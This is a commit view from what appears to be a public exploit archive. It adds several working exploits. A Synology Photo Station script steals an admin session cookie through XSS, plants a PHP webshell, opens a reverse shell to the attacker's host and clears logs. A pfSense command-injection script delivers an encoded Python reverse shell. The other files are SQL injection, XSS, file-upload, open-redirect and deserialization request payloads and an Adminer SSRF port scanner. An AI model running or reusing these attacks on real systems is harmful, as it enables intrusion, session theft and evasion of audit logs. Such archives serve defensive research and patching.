Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)

Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)
Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)

Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)
This commit is contained in:
Offensive Security 2018-01-16 05:02:18 +00:00
parent f589361686
commit 50c008ba06
41 changed files with 3781 additions and 145 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

304
exploits/hardware/remote/43609.py Executable file
View file

@ -0,0 +1,304 @@
#!/usr/local/bin/python
"""
Synology Photo Station <= 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability
Found by: mr_me
Tested: 6.8.2-3461 (latest at the time)
Vendor Advisory: https://www.synology.com/en-global/support/security/Synology_SA_18_02
# Summary:
==========
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Synology Photo Station. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
The specific flaw exists within the SYNOPHOTO_Flickr_MultiUpload function. When parsing the prog_id parameter, the process does not properly validate a user-supplied string before using it to execute a call to file_put_contents. An attacker can leverage this vulnerability to execute code under the context of the PhotoStation user.
# Example:
==========
saturn:synology mr_me$ ./sinology.py 192.168.100.9 en0
Synology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability
mr_me
(+) waiting for the admin...
(+) stolen: qt4obchbqfss2ap9ct9nb1i534
(+) updated the settings!
(+) wrote php code!
(+) attempting race condition...
(+) won the race!
(+) rce is proven!
(+) deleted the image and scrubbed the logs!
(+) starting handler on port 4444
(+) connection from 192.168.100.9
(+) pop thy shell!
id
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
"""
import sys
import socket
import requests
import telnetlib
from threading import Thread
from base64 import b64encode as b64e
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
try:
import netifaces as ni
except:
print "(-) try 'pip install netifaces'"
sys.exit(1)
# haven't pwned yet
pwned = False
class xss(BaseHTTPRequestHandler):
def log_message(self, format, *args):
return
def do_GET(self):
global s
# incase the referer isn't set, its coming from someone else
try:
referer = self.headers.get('Referer')
except:
referer = ""
# of course this isn't bullet proof, but its enough for a poc
if t in referer:
if "PHPSESSID" in self.path:
s = self.path.split("=")[1]
print "(+) stolen: %s" % s
pwned = True
self.send_response(200)
self.end_headers()
return
def _build_bd(raw=False):
php = "<?php file_put_contents('si.php','<?php eval(base64_decode($_SERVER[HTTP_SIN]));');die('done'); ?>.gif"
if raw == True:
return php
return "photo_2f_%s" % (php.encode("hex"))
def we_can_set_settings(target, session):
uri = "http://%s/photo/admin/share_setting.php" % target
d = {
"action" : "set_setting",
"social_flickr" : "on",
"share_upload_orig" : "on"
}
c = { "PHPSESSID" : session }
r = requests.post(uri, data=d, cookies=c).json()
if "success" in r:
if r["success"] == True:
return True
return False
def we_can_upload(target, session):
uri = "http://%s/photo/webapi/file.php" % (target)
p = { "SynoToken" : session }
c = { "PHPSESSID" : session }
# valid gif, important
gif = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00"
gif += "\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c"
gif += "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02"
f = { "original": ("si.gif", gif) }
d = {
"api": "SYNO.PhotoStation.File",
"method" : "uploadphoto",
"version" : 1,
"dest_folder_path": "",
"duplicate" : "rename",
"mtime": "1513540164787",
"filename" : _build_bd(True)
}
r = requests.post(uri, params=p, files=f, cookies=c, data=d).json()
if "success" in r:
if r["success"] == True:
return True
return False
def race(target):
r = ""
while("done" not in r):
r = requests.get("http://%s/photo/pwn.php" % target).text
return True
def we_won_race(target, session, racing_thread):
while(racing_thread.isAlive()):
uri = "http://%s/photo/SocialNetwork/flickr.php" % target
d = {
"prog_id" : "../../volume1/@appstore/PhotoStation/photo/pwn.php",
"action" : "multi_upload",
"token" : 1,
"secret" : "",
"photoList" : _build_bd()
}
c = { "PHPSESSID": session }
requests.post(uri, cookies=c, data=d)
return True
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (cb_host, cb_port))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (cb_host, cb_port))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def exec_code(target):
handlerthr = Thread(target=handler, args=(cb_port,))
handlerthr.start()
we_can_exec_php(target, b64e(build_php_code()))
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def we_can_exec_php(target, php):
h = { "SIN" : php }
r = requests.get("http://%s/photo/si.php" % target, headers=h)
if r.text == "pwn":
return True
return False
def we_can_clean_up(target, session):
uri = "http://%s/photo/webapi/photo.php" % target
d = {
"api": "SYNO.PhotoStation.Photo",
"method" : "delete",
"version" : 1,
"id" : _build_bd()
}
c = { "PHPSESSID" : session }
h = { "X-SYNO-TOKEN" : session }
r = requests.post(uri, cookies=c, data=d, headers=h).json()
if "success" in r:
if r["success"] == True:
return True
return False
def banner():
return """\n\tSynology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability\n\tmr_me\n"""
def do_xss(target, ip):
j = "\"><img src=x onerror=this.src=\"http://%s:9090/?\"+document.cookie>" % ip
d = {
"api" : "SYNO.PhotoStation.Auth",
"method" : "login",
"version" : 1,
"username" : j,
"password" : "WAT",
"enable_syno_token" : "true"
}
r = requests.post("http://%s/photo/webapi/auth.php" % target, data=d).json()
def we_can_clear_logs(target, session):
c = { "PHPSESSID" : session }
p = { "SynoToken" : session }
d = {
"api": "SYNO.PhotoStation.PhotoLog",
"method" : "clear",
"version" : 1,
}
r = requests.post("http://%s/photo/webapi/log.php" % target, data=d, params=p, cookies=c).json()
if "success" in r:
if r["success"] == True:
return True
return False
def start_pain_train(t, s):
if we_can_set_settings(t, s):
print "(+) updated the settings!"
if we_can_upload(t, s):
print "(+) wrote php code!"
print "(+) attempting race condition..."
r = Thread(target=race, args=(t,))
r.start()
if we_won_race(t, s, r):
print "(+) won the race!"
if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')):
print "(+) rce is proven!"
if we_can_clean_up(t, s) and we_can_clear_logs(t, s):
print "(+) deleted the image and scrubbed the logs!"
exec_code(t)
def keep_running():
if pwned == True:
return False
return True
def main():
print banner()
global cb_host, cb_port, s, t
if len(sys.argv) != 3:
print "(+) usage: %s <target> <interface>" % sys.argv[0]
print "(+) eg: %s 192.168.100.9 en0" % sys.argv[0]
sys.exit(1)
s = ""
t = sys.argv[1]
cb_port = 4444
try:
cb_host = ni.ifaddresses(sys.argv[2])[2][0]['addr']
except:
print "(-) no ip address associated with that interface!"
sys.exit(1)
do_xss(t, cb_host)
try:
server = HTTPServer(('0.0.0.0', 9090), xss)
print '(+) waiting for the admin...'
while keep_running():
server.handle_request()
except KeyboardInterrupt:
print '(+) shutting down the web server'
server.socket.close()
if s != "":
start_pain_train(t, s)
if __name__ == "__main__":
main()

57
exploits/java/webapps/43594.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56
# Date: 30 Oct 2017
# Exploit Author: Vahagn Vardanyan
# Vendor Homepage: Oracle
# Software Link: Oracle PeopleSoft
# Version: 8.54, 8.55, 8.56
# Tested on: Windows, Linux
# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366
The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56.
POST /monitor/%SITE_NAME% HTTP/1.1
Host: PeopleSoft:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0)
Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie:a=aa
§JAVA_SERIAL§
%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information
disclosure or brute force. information for automation detection:
1. If monitor component deployed and you don't know %SITE_NAME% then
will get this type of error
<h2>Site name is not valid. Check your URL syntax and try again.</h2>
1. If %SITE_NAME% is true then you will get this message
PeopleSoft
Ping Test for Monitor Servlet
Ping successful. Site %SITE_NAME% is valid.
1. If monitor don't deployed then you will get this message
Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No
indication is given of whether the condition is temporary or
permanent.
If the server does not wish to make this information available to the
client, the status code 403 (Forbidden) can be used instead. The 410
(Gone) status code SHOULD be used if the server knows, through some
internally configurable mechanism, that an old resource is permanently
unavailable and has no forwarding address.

21
exploits/jsp/webapps/43592.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Oracle E-Business suite Open Redirect
# Google Dork: inurl:OA_HTML/cabo/
# Date: April 2017
# Exploit Author: [author]
# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
# Software Link: [download link if available]
# Version: Oracle E-Business Suite (REQUIRED)
# Tested on: [relevant os]
# CVE : CVE-2017-3528
The exploit can be leveraged for an open redirect using the following
exploit path:
https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com
Oracle E-Business suite is vulnerable to an open redirect issue,
specifically the redirect parameter allows any domain to be supplied
and it will be rendered on the target's site.
Note I was also credited for this CVE, see the Oracle
CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)

110
exploits/php/webapps/43560.py Executable file
View file

@ -0,0 +1,110 @@
#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
import argparse
import requests
import urllib
import urllib3
import collections
'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password
# command to be converted into octal
command = """
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
""" % (lhost, lport)
payload = ""
# encode payload in octal
for char in command:
payload += ("\\" + oct(ord(char)).lstrip("0o"))
login_url = 'https://' + rhost + '/index.php'
exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
headers = [
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
('Accept-Language', 'en-US,en;q=0.5'),
('Referer',login_url),
('Connection', 'close'),
('Upgrade-Insecure-Requests', '1'),
('Content-Type', 'application/x-www-form-urlencoded')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Disable insecure https connection warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
client = requests.session()
# try to get the login page and grab the csrf token
try:
login_page = client.get(login_url, verify=False)
index = login_page.text.find("csrfMagicToken")
csrf_token = login_page.text[index:index+128].split('"')[-1]
except:
print("Could not connect to host!")
exit()
# format login variables and data
if csrf_token:
print("CSRF token obtained")
login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ]
login_data = collections.OrderedDict(login_data)
encoded_data = urllib.parse.urlencode(login_data)
# POST login request with data, cookies and header
login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers)
else:
print("No CSRF token!")
exit()
if login_request.status_code == 200:
print("Running exploit...")
# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell
try:
exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5)
if exploit_request.status_code:
print("Error running exploit")
except:
print("Exploit completed")

28
exploits/php/webapps/43567.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting
# Date: 12-01-2018
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: foxsash.com
# Version: 1.5
# CVE-ID: CVE-2018-5479
ImgHosting Image Storage System quick and easy image hosting without
registration. Service is ideal for fast and reliable placement of images
for forums, blogs and websites. Simple design, comfortable customers,
direct links to pictures. This hosting service that we do every day use.
Like thousands of other people. We do service to the people.
ImgHosting 1.5 (According footer information) is vulnerable to XSS attacks.
The affected function is its search engine. Since there is an user/admin
login interface, it's possible for attackers to steal sessions of users and
thus admin(s). By sending users an infected URL, code will be executed.
---------------------------
---------------------------
PoC:
http://{TARGET}/?search="><script>confirm(document.domain)<%2Fscript>
---------------------------
---------------------------
Evil javascript code can be inserted and will be executed when visiting the link

44
exploits/php/webapps/43569.txt Normal file
View file

@ -0,0 +1,44 @@
# # # # #
# Exploit Title: Domains & Hostings Manager PRO v 3.0 - Authentication Bypass
# Date: 13.01.2018
# Vendor Homepage: http://endavi.com/
# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
# Demo: http://endavi.com/dhrpro_demo/
# Version: 3.0
# Tested on: Windows 10
# # # # #
# Exploit Author: Tauco
Description :
While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.
In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.
POC
===================================================================================================
POST /dhrpro_demo/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
accusername=admin%27+or+%271%27%3D%271&accuserpassword=admin%27+or+%271%27%3D%271&login=+ENTER+
Login = admin' or '1'='1
Password = admin' or '1'='1
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Domains & Hostings Manager PRO v 3.0
Vulnerable Parameter(s): [+] accusername, accuserpassword

62
exploits/php/webapps/43590.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: PerfexCRM 1.9.7 Unrestricted php5 File upload
# Exploit Author: Ahmad Mahfouz
# Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-17976
# Version: v1.9.7
# Software Link: https://www.perfexcrm.com/
# bypassing the misconfigured file upload with file .php5
GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]
JSON Response:
{"added":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"0","hash":"[XXX]","name":"shell.php5","phash":"[XXXX] "}],"changed":[{"isowner":false,"mime":"directory","read":1,"write":1,"size":0,"hash":"[ XXX]","name":"asa","phash":"[ XXX] ","volumeid":"[XXX]"}]}
#bypass the file content restriction by adding TEXT line to represent mime type text
Request
POST /admin/utilities/elfinder_init HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
cmd=put&target=[folder]&encoding=UTF-8&content=demo
newline to represent text mime type
<?php
phpinfo();
?>
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Content-Length: 167
{"changed":[{"isowner":false,"mime":"text\/plain","read":1,"write":1,"size":"44","hash":"[XXX]","name":"shell.php5","phash":"[XXX]]"}]}

24
exploits/php/webapps/43591.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Date: 30/12/2017
# CVE: CVE-2017-17999
# Vendor Homepage: http://fairsketch.com/
# Version: 1.9
POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
search=product'%20and%20(select*from(select(sleep(20)))a)--%20

430
exploits/php/webapps/43593.py Executable file
View file

@ -0,0 +1,430 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security
Vendor:
==============
www.adminer.org
Product:
================
Adminer <= v4.3.1
Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a
single file ready to deploy to the target server. Adminer is available for MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.
https://github.com/vrana/adminer/releases/
Vulnerability Type:
===================
Server Side Request Forgery
CVE Reference:
==============
N/A
Security Issue:
================
Adminer allows unauthenticated connections to be initiated to arbitrary systems/ports. This vulnerability can be used to potentially bypass firewalls to
identify internal hosts and perform port scanning of other servers for reconnaissance purposes. Funny thing is Adminer throttles invalid login attempts
but allows endless unauthorized HTTP connections to other systems as long as your not trying to authenticate to Adminer itself.
Situations where Adminer can talk to a server that we are not allowed to (ACL) and where we can talk to the server hosting Adminer, it can do recon for us.
Recently in LAN I was firewalled off from a server, however another server running Adminer I can talk to. Also, that Adminer server can talk to the target.
Since Adminer suffers from Server-Side Request Forgery, I can scan for open ports and gather information from that firewalled off protected server.
This allowed me to not only bypass the ACL but also hide from the threat detection system (IDS) monitoring east west connections.
However, sysadmins who check the logs on the server hosting Adminer application will see our port scans.
root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +0000] "GET ///?server=TARGET-IP:21&username= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +0000] "GET ///?server=TARGET-IP:22&username= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +0000] "GET ///?server=TARGET-IP:23&username= HTTP/1.1" 403 6021 "-" "-"
Details:
==================
By comparing different failed error responses from Adminer when making SSRF bogus connections, I figured out which ports are open/closed.
Port open ==> Lost connection to MySQL server at 'reading initial communication packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '<TARGET-IP>';
Port closed ==> No connection could be made because the target machine actively refused it
Port closed ==> A connection attempt failed.
This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof of concept that leverages Adminer SSRF vulnerability.
PortMiner observations:
======================
No response 'read operation timed out' means the port is possibly open or filtered and should be given a closer look if possible. This seems to occur when scanning
Web server ports like 80, 443. However, when we get error responses like the ones above from the server we can be fairly certain a port is either open/closed.
Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p 5555
Use range 5555-5555
Exploit/POC:
=============
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call
#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=========================
#D1rty0Tis says hi.
#timeout
MAX_TIME=32
#ports to log
port_lst=[]
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']
BANNER='''
____ _ __ __ _
| _ \ | | | \/ (_)
| |__) |__ _ __| |_| \ / |_ _ __ ___ _ __
| ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__|
| | | (_) | | | |_| | | | | | | | __/ |
|_| \___/|_| \__|_| |_|_|_| |_|\___|_|
'''
def info():
print "\nPortMiner depends on Error messages to determine open/closed ports."
print "Read operations reported 'timed out' may be open/filtered.\n"
def greet():
print 'Adminer Unauthenticated SSRF Port Scanner Tool'
print 'Targets Adminer used for MySQL administration\n'
print 'by hyp3rlinx - apparition security'
print '-----------------------------------------------------\n'
print 'Scan small ranges or single ports or expect to wait.\n'
print 'Do not scan networks without authorized permission.'
print 'Author not responsible for abuse/misuse.\n'
def chk_ports(p):
p=p.replace('-',',')
port_arg=p.split(',')
try:
if len(port_arg)>1:
if int(port_arg[1]) < int(port_arg[0]):
print 'Port range not valid.'
raw_input()
return
if int(port_arg[1])>65535:
print 'Exceeded max Port range 65535.'
raw_input()
return
except Exception as e:
print str(e)
return None
return list(range(int(port_arg[0]),int(port_arg[1])+1))
def log(IP):
try:
file=open('PortMiner.txt', 'w')
file.write(IP+'\n')
for p in port_lst:
file.write(p+'\n')
file.close()
except Exception as e:
print str(e)
print "\nSee PortMiner.txt"
def use_ssl(ADMINER,ADMINER_PORT):
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ADMINER,int(ADMINER_PORT)))
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.close()
except Exception as e:
print ""
return False
return True
def version(ip,port,uri,use_ssl):
res=""
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,int(port)))
if use_ssl:
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.send('GET '+'/'+uri+'/?server='+':'+'&username=\r\n\r\n')
except Exception as e:
print 'Host up but cant connect.' #str(e)
print 'Re-check Host/Port/URI.'
s.close()
return 504
while True:
RES=s.recv(512)
if RES.find('Forbidden')!=-1:
print 'Forbidden 403'
s.close()
return None
if RES.find('401 Authorization Required')!=-1:
print '401 Authorization Required'
s.close()
return None
ver = re.findall(r'<span class="version">(.*)</span>',RES,re.DOTALL|re.MULTILINE)
if not RES:
s.close()
return None
if ver:
print 'Your Adminer '+ ver[0] + ' works for us now.'
s.close()
return ver
s.close()
return None
def scan(ADMINER,ADMINER_PORT,ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL):
global MAX_TIME,port_range
RES=''
print 'scanning ports: %s ' % str(port_range[0])+'to ' + str(port_range[-1])+' ...'
for aPort in port_range:
aPort=str(aPort)
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(MAX_TIME)
s.connect((ADMINER,ADMINER_PORT))
if USE_SSL:
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.send('GET /'+ADMINER_URI+'/?server='+TARGET+':'+aPort+'&username= HTTP/1.1\r\nHost: '+TARGET+'\r\n\r\n')
except Exception as e:
print str(e)
s.close()
return
while True:
try:
RES=s.recv(512)
###print RES
###Should see HTTP/1.1 403 not 200
